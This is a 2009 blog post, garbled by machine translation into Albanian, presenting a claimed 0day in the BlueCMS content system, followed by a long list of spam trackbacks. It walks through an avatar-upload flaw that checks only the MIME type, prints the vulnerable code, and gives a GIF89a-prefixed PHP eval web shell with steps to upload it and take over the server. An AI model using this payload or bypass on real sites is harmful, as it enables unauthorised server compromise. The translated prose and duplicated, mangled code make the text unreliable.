RSS

bluecms 0day

Kjo hyrje ishte e postuar më 07 Tetor 2009

: St0p
Riprodhohet ju lutem tregoni burimin: http://www.st0p.org

Shënim: Na vjen keq, versioni i flokëve në mëngjes gjatë natës quhet dyfishtë të gazetës një 0DAY, i informuar, dhe thjesht shkoni me zyrtarin, shikoi, dhe ka lëshuar një arnim të sigurisë së shpejti ah .. ju mund të shkoni online nuk është një version të përditësuar të testit ...

Mjerisht, grupi Një mik i imi bëri një CMS, tha se të dhënat e përdoruesit për të ndryshuar disa mund të injektohet, tha analiza, me instaluar në vend pas, nuk mund të përdorë citate të vetme janë arratisur magic_quotes_gpc = off. . .

Shiko përfshijnë linjë / common.inc.php, të heqë dorë. . 

  Një
 2
 3
 4
 5
 6
 7
 8
 9

  ......
  ! get_magic_quotes_gpc ( ) ) if (! get_magic_quotes_gpc ())
  {
 	 deep_addslashes ( $_POST ) ; Dollarë _POST Deep_addslashes = ($ _POST);
 	 deep_addslashes ( $_GET ) ; $ _GET = Hap Deep_addslashes ($ _GET);
 	 deep_addslashes ( $_COOKIES ) ; Dollarë _COOKIES = Hap Deep_addslashes ($ _COOKIES);
 	 deep_addslashes ( $_REQUEST ) ; Dollarë _REQUEST = Hap Deep_addslashes ($ _REQUEST);
  }
 ......

Ndoshta st0p fat të mirë, shih ngarkoni fotot e pjesëve, analiza e kodit, të përdorin diçka që gjendet në user.php. . 

  Një
 2
 3
 4
 5
 6

  BLUE_ROOT . 'include/upload.class.php' ) ; //调用上传类 require_once (BLUE_ROOT. 'përfshijnë / upload.class.php'); / / thirrje klasës upload
     new upload ( ) ; $ = New Image upload ();
	  isset ( $_FILES [ 'face_pic' ] [ 'error' ] ) && $_FILES [ 'face_pic' ] [ 'error' ] == 0 ) { if (isset ($ _FILES ['face_pic'] ['error']) && $ _FILES ['face_pic'] ['error'] == 0) {
		 $image -> img_upload ( $_FILES [ 'face_pic' ] , 'face_pic' ) ; $ Face_pic = $ image -> img_upload ($ _FILES ['face_pic'], 'face_pic'); 
                          / / Nuk ka zbuluar prapashtesë direkt në, klasa do të jetë në gjendje të kalojë SHELL
	 }

Open include / upload.class.php vetëm për të zbuluar header fotografi nuk ka zbuluar me prapashtesë 

  Një
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27

 upload { private $allow_image_type = array ( 'image/jpg' , 'image/gif' , 'image/png' , 'image/pjpeg' ) ; ...... function img_upload ( $file , $dir = '' , $imgname = '' ) { if ( empty ( $dir ) ) { $dir = BLUE_ROOT . DATA . UPLOAD . date ( "Ym" ) . "/" ; } else { $dir = BLUE_ROOT . DATA . UPLOAD . $dir . "/" ; } if ( ! file_exists ( $dir ) ) { if ( ! mkdir ( $dir ) ) { showmsg ( '上传过程中创建目录失败' ) ; } } if ( empty ( $imgname ) ) { $imgname = $this -> create_tempname ( ) . $this -> get_type ( $file [ 'name' ] ) ; } $imgname = $dir . $imgname ; if ( ! in_array ( $file [ 'type' ] , $this -> allow_image_type ) ) { //只是检测了文件头部来着,那我们就直接构造一个SHELL就好了 showmsg ( '不允许的图片类型' ) ; } } ...... Klasa upload {private $ allow_image_type = array ('image / jpg', 'image / gif "," image / png "," image / pjpeg'); ...... img_upload funksion ($ file, $ dir ='', $ imgname ='') {if (bosh ($ dir)) {$ dir = BLUE_ROOT DATA NGARKO date ("YM") "/";....} else {$ dir = TË DHËNAT BLUE_ROOT NGARKO $ dir "/";..} if (file_exists ($ dir)) {if (mkdir ($ dir)!) {showmsg ('Procesi upload pamundur për të krijuar dosjen');}} në qoftë se (bosh ($ imgname)) {$ imgname = $ këtë -> create_tempname () $ këtë -> (skedë $ ['name']) get_type;.} $ imgname = $ $ dir imgname; if (in_array ($.! fotografi ['type'], $ këtë -> allow_image_type)) {/ / vetëm për të zbuluar header file me, ne drejtpërdrejt të ndërtuar një predhë si një showmsg e tipitimazhit ('nuk lejohet');}}

Të ruaj mësipërme për st0p.php 

  Një
 2

  GIF89a
 ( $_POST [ st0p ] ) ; ?> <Php eval ($ _POST [st0p]);?>

Rrjeti Shënim llogari login, Anëtar -> profili im, pastaj ngarkoj imazhin e ri te zgjedhjeve ne ndërtuar një skedar të PHP, pika për të konfirmuar të modifikojë, e shohin adresa është i suksesshëm, right-click mbi foto drejtpërdrejt në linjë. . SHELL Fjala ngarkua me sukses!

bluecms-0day1

bluecms-0day2

Analiza është e përfunduar, unë shpresoj që shkëmbimet më shumë, çështja e këtyre gjërave të duan vetëm për të përmbushur disa miq së bashku për të diskutuar teknologji, të ngritur grupin, si dhe, vetëm një grup i zakonshëm, vetëm 100 persona, të pastruar, nuk flas u ngarkuar keq B kaos T, depresion, grupi është i hapur për shkëmbim, mos flas ka qenë vendshënuesi përfaqson në vend, të duan të progresit, i përmbajtur rrugës nuk mund të shkojnë!
Nëse jeni në grupin e vetëm për të marrë rezultatet e diskutimeve e të tjerëve nga të tjerët, nuk e di për të paguar, ose vetëm ardhur scuba diving, ose pa. . .

, , ,
Mëso · Te Cheats arteve marciale
Chinese (Simplified) flagItalian flagKorean flagChinese (Traditional) flagPortuguese flagEnglish flagGerman flagFrench flagSpanish flagJapanese flagArabic flagRussian flagGreek flagDutch flagBulgarian flagCzech flagCroatian flagDanish flagFinnish flagHindi flagPolish flagRomanian flagSwedish flagNorwegian flagCatalan flagFilipino flagHebrew flagIndonesian flagLatvian flagLithuanian flagSerbian flagSlovak flagSlovenian flagUkrainian flagVietnamese flagAlbanian flagEstonian flagGalician flagMaltese flagThai flagTurkish flagHungarian flag


74 Responses to "bluecms 0day"

  1. Nga хостинг17 Nëntor 2009 | Përgjigju

    Ja, verjetno zato je


  1. 73 trackback (s)

  2. 8 korrik 2011: Fillestar Pencil Guide, Vizatim
  3. 21 dhjetor 2011: Taxi Boston
  4. 24 dhjetor 2011: Kopshtarëve in përkuleni e Fund N8
  5. 25 dhjetor 2011: Kopshtarëve Peisazhi London
  6. Jan 6, 2012: EBook
  7. Jan 17, 2012: teknologjia definitive supercubeï ¿ ½ 6000
  8. Jan 18, 2012: nutricion deportiva
  9. Jan 19, 2012: Whatman, thimbles Nxjerrja
  10. Jan 19, 2012: tiu 1
  11. Jan 21, 2012: portarollo
  12. Jan 24, 2012: antykwariaty
  13. Jan 29, 2012: Ï »¿ Garanci Sherbime alfa,
  14. Jan 29, 2012: Garanci Sherbime Alpha
  15. Jan 30, 2012: parashikimet NBA
  16. Jan 30, 2012: fotograf manistee wedding
  17. Jan 31, 2012: wof Christchurch
  18. Jan 31, 2012: videos free porn për
  19. Jan 31, 2012: Bodybuilding t shirt
  20. 4 shkurt 2012: shanset NFL
  21. 5 shkurt 2012: Ku mund të bast Super Bowl 46
  22. 6 shkurt 2012: lëndim prapa
  23. 6 shkurt 2012: falas shqip
  24. 7 shkurt 2012: st chiropractor george
  25. 7 shkurt 2012: clairvoyants në Mbretërinë e Bashkuar
  26. 9 shkurt 2012: sportsbook bast
  27. 9 shkurt 2012: flebotomi Teknik
  28. 10 shkurt 2012: Mazda pjesë këmbimi
  29. 12 shkurt 2012: bravandreqës makinë në Portin Richmond, NY
  30. 13 shkurt 2012: agustus
  31. 15 shkurt 2012: trycholog Gdynia
  32. 18 shkurt 2012: kuponat ndryshim të naftës
  33. 19 shkurt 2012: top asian sportsbook
  34. 22 shkurt 2012: Donald pak Bobby t'i shmanget abone
  35. 22 shkurt 2012: Auckland drainlayer
  36. 25 shkurt 2012: drita psikike
  37. 26 shkurt 2012: Elektrik
  38. 26 shkurt 2012: asistent fizike terapi
  39. Mar 1, 2012: campers bota
  40. Mar 3, 2012: psikologji
  41. Mar 7, 2012: Abdel-malik
  42. Mar 8, 2012: shtëpitë nz
  43. Mar 8, 2012: swing golf ndihma
  44. Mar 10, 2012: mobilieri auckland
  45. Mar 12, 2012: lexime psikike
  46. Mar 13, 2012: pula natë
  47. Mar 14, 2012: Aboubakar
  48. Mar 18, 2012: Lojra Online
  49. Mar 19, 2012: Alisson
  50. Mar 23, 2012: NBA zgjedh
  51. Mar 23, 2012: lirë psikike chat
  52. Mar 24, 2012: siguria dyert nz
  53. Mar 27, 2012: dyqane hiking
  54. Mar 29, 2012: Shtëpitë e pushimit in Auckland
  55. Mar 30, 2012: Surveyors auckland
  56. Mar 31, 2012: peshk në internet dyqan
  57. 3 prill 2012: Ares, Pa pagesë Shkarko
  58. 7 prill 2012: szkola jazdy Gdynia opinie
  59. 10 prill 2012: antykwariaty
  60. 18 prill 2012: Blinds
  61. 18 prill 2012: Beats Pa pagesë By Dre
  62. 20 prill 2012: Paketat Fixhi
  63. 22 prill 2012: Marketing Site
  64. 22 prill 2012: treehouses
  65. 22 prill 2012: Izolimi Dynamic
  66. 22 prill 2012: i tatuazhet fisnor
  67. 22 prill 2012: Ranking SEO Services,
  68. 22 prill 2012: Furnizim Zinxhiri Menaxhim i kursit,
  69. 22 prill 2012: CIA Test Prep
  70. 24 prill 2012: dritaret auckland
  71. 24 prill 2012: Chanel, Watches
  72. 3 maj 2012: kuotat sigurimin e makinës
  73. 6 maj 2012: diellor
  74. 6 maj 2012: vlerësimi i biznesit

Ju duhet të keni hyrë brenda për të postoj një koment.